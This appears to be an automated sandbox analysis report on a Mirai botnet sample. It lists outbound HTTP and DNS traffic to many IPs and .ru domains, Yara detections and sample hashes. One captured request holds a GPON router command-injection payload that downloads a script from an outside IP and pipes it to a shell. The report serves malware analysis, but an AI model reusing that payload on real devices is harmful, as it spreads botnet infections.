Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.62.194.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.62.194.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.62.194.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 136.243.14.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 136.243.14.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.96.108Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.17Connection: close
Source: global traffic DNS traffic detected: DNS query: akak.ru
Source: global traffic DNS traffic detected: DNS query: www.akak.ru
Source: global traffic DNS traffic detected: DNS query: ekac.ru
Source: global traffic DNS traffic detected: DNS query: www.ekac.ru
Source: global traffic DNS traffic detected: DNS query: fabb.ru
Source: global traffic DNS traffic detected: DNS query: www.fabb.ru
Source: global traffic DNS traffic detected: DNS query: ckea.ru
Source: global traffic DNS traffic detected: DNS query: bblk.ru
Source: global traffic DNS traffic detected: DNS query: www.bblk.ru
Source: global traffic DNS traffic detected: DNS query: www.ckea.ru
Source: global traffic DNS traffic detected: DNS query: fafa.ru
Source: global traffic DNS traffic detected: DNS query: www.fafa.ru
Source: global traffic DNS traffic detected: DNS query: beke.ru
Source: global traffic DNS traffic detected: DNS query: www.beke.ru
Source: global traffic DNS traffic detected: DNS query: kece.ru
Source: global traffic DNS traffic detected: DNS query: www.kece.ru
Source: global traffic DNS traffic detected: DNS query: aada.ru
Source: global traffic DNS traffic detected: DNS query: www.aada.ru
Source: global traffic DNS traffic detected: DNS query: afce.ru
Source: global traffic DNS traffic detected: DNS query: www.afce.ru
Source: global traffic DNS traffic detected: DNS query: kcdk.ru
Source: global traffic DNS traffic detected: DNS query: www.kcdk.ru
Source: global traffic DNS traffic detected: DNS query: cdck.ru
Source: global traffic DNS traffic detected: DNS query: www.cdck.ru
Source: global traffic DNS traffic detected: DNS query: beca.ru
Source: global traffic DNS traffic detected: DNS query: www.beca.ru
Source: global traffic DNS traffic detected: DNS query: fkll.ru
Source: global traffic DNS traffic detected: DNS query: www.fkll.ru
Source: global traffic DNS traffic detected: DNS query: aacf.ru
Source: global traffic DNS traffic detected: DNS query: www.aacf.ru
Source: global traffic DNS traffic detected: DNS query: bdak.ru
Source: global traffic DNS traffic detected: DNS query: bfba.ru
Source: global traffic DNS traffic detected: DNS query: www.bfba.ru
Source: global traffic DNS traffic detected: DNS query: www.bdak.ru
Source: global traffic DNS traffic detected: DNS query: alal.ru
Source: global traffic DNS traffic detected: DNS query: www.alal.ru
Source: global traffic DNS traffic detected: DNS query: acec.ru
Source: global traffic DNS traffic detected: DNS query: www.acec.ru
Source: global traffic DNS traffic detected: DNS query: kbak.ru
Source: global traffic DNS traffic detected: DNS query: aaal.ru
Source: global traffic DNS traffic detected: DNS query: www.aaal.ru
Source: global traffic DNS traffic detected: DNS query: www.kbak.ru
Source: global traffic DNS traffic detected: DNS query: aeke.ru
Source: global traffic DNS traffic detected: DNS query: www.aeke.ru
Source: global traffic DNS traffic detected: DNS query: bbdc.ru
Source: global traffic DNS traffic detected: DNS query: www.bbdc.ru
Source: global traffic DNS traffic detected: DNS query: labb.ru
Source: global traffic DNS traffic detected: DNS query: www.labb.ru
Source: global traffic DNS traffic detected: DNS query: baad.ru
Source: global traffic DNS traffic detected: DNS query: www.baad.ru
Source: global traffic DNS traffic detected: DNS query: ldal.ru
Source: global traffic DNS traffic detected: DNS query: www.ldal.ru
Source: global traffic DNS traffic detected: DNS query: kafl.ru
Source: global traffic DNS traffic detected: DNS query: www.kafl.ru
Source: global traffic DNS traffic detected: DNS query: cbke.ru
Source: global traffic DNS traffic detected: DNS query: www.cbke.ru
Source: global traffic DNS traffic detected: DNS query: cldb.ru
Source: global traffic DNS traffic detected: DNS query: www.cldb.ru
Source: global traffic DNS traffic detected: DNS query: fflf.ru
Source: global traffic DNS traffic detected: DNS query: www.fflf.ru
Source: global traffic DNS traffic detected: DNS query: cabl.ru
Source: global traffic DNS traffic detected: DNS query: www.cabl.ru
Source: global traffic DNS traffic detected: DNS query: ebbl.ru
Source: global traffic DNS traffic detected: DNS query: www.ebbl.ru
Source: global traffic DNS traffic detected: DNS query: bcaf.ru
Source: global traffic DNS traffic detected: DNS query: www.bcaf.ru
Source: global traffic DNS traffic detected: DNS query: acce.ru
Source: global traffic DNS traffic detected: DNS query: www.acce.ru
Source: global traffic DNS traffic detected: DNS query: kkkb.ru
Source: global traffic DNS traffic detected: DNS query: www.kkkb.ru
Source: global traffic DNS traffic detected: DNS query: ccad.ru
Source: global traffic DNS traffic detected: DNS query: www.ccad.ru
Source: global traffic DNS traffic detected: DNS query: bdbf.ru
Source: global traffic DNS traffic detected: DNS query: www.bdbf.ru
Source: global traffic DNS traffic detected: DNS query: aaka.ru
Source: global traffic DNS traffic detected: DNS query: www.aaka.ru
Source: global traffic DNS traffic detected: DNS query: lffc.ru
Source: global traffic DNS traffic detected: DNS query: www.lffc.ru
Source: global traffic DNS traffic detected: DNS query: fkdb.ru
Source: global traffic DNS traffic detected: DNS query: www.fkdb.ru
Source: global traffic DNS traffic detected: DNS query: abdd.ru
Source: global traffic DNS traffic detected: DNS query: www.abdd.ru
Source: global traffic DNS traffic detected: DNS query: fdak.ru
Source: global traffic DNS traffic detected: DNS query: www.fdak.ru
Source: global traffic DNS traffic detected: DNS query: abka.ru
Source: global traffic DNS traffic detected: DNS query: www.abka.ru
Source: global traffic DNS traffic detected: DNS query: akfb.ru
Source: global traffic DNS traffic detected: DNS query: www.akfb.ru
Source: global traffic DNS traffic detected: DNS query: akcd.ru
Source: global traffic DNS traffic detected: DNS query: www.akcd.ru
Source: global traffic DNS traffic detected: DNS query: kbaa.ru
Source: global traffic DNS traffic detected: DNS query: www.kbaa.ru
Source: global traffic DNS traffic detected: DNS query: ccld.ru
Source: global traffic DNS traffic detected: DNS query: laka.ru
Source: global traffic DNS traffic detected: DNS query: www.laka.ru
Source: global traffic DNS traffic detected: DNS query: aedd.ru
Source: global traffic DNS traffic detected: DNS query: www.aedd.ru
Source: global traffic DNS traffic detected: DNS query: www.ccld.ru
Source: global traffic DNS traffic detected: DNS query: aaak.ru
Source: global traffic DNS traffic detected: DNS query: www.aaak.ru
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.15Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: firmware.armv7l.elf, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5576.1.00007fb6f8017000.00007fb6f8037000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5580.1.00007fb6f8017000.00007fb6f8037000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5578.1.00007fb6f8017000.00007fb6f8037000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: /usr/bin/ioxuhzzigj, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: /usr/bin/urztrmjq, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: firmware.armv7l.elf, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
